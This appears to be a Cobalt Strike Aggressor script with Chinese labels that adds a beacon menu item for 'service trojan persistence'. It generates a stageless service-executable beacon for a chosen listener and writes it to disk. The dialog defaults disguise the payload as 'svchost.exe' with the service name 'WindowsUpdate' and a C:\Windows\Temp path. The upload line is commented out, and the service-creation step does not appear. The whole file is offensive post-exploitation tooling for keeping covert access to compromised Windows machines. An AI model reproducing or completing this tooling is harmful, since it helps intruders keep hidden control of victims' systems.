sub ready {
	$handle = openf(">$exename");
	writeb($handle, $1);
	closef($handle);
}

sub servicerun{
	if (size($bid) > 1){
		show_message("不支持多beacon操控");
	}else{
		$arch = barch($bid[0]);
		$exename = script_resource($3['exename']);
		btask($bid, "Create Service exe,output: $exename");
		artifact_stageless("$3['listener']", "svcexe", "$arch", "", &ready);
		btask($bid, "upload file: $exename");
		sleep(5);
		if(-exists script_resource($exename)){
			println("file found");
		}else{
			println("file not found");
		}
		# bupload($bid, $exename);
	}
}


popup beacon_bottom{
	menu "&服务马权限维持"{
			item "&cs服务马"{
			$bid = $1;
			$dialog = dialog("ServiceRunBeacon", %(uploadoutpath => "C:\\Windows\\Temp", exename => "svchost.exe", servicename => "WindowsUpdate", bid => $bid), &servicerun);
			dialog_description($dialog, "生成服务马上传执行，进行权限维持\n不支持多beacon操控");
				
			drow_text($dialog, "uploadoutpath", "uploadoutpath:");
			drow_text($dialog, "servicename",  "servicename:");
			drow_text($dialog, "exename", "outputexename:");
			drow_listener($dialog, "listener", "Listener: ");
			dbutton_action($dialog, "run");
			dialog_show($dialog);
		}
	}
}
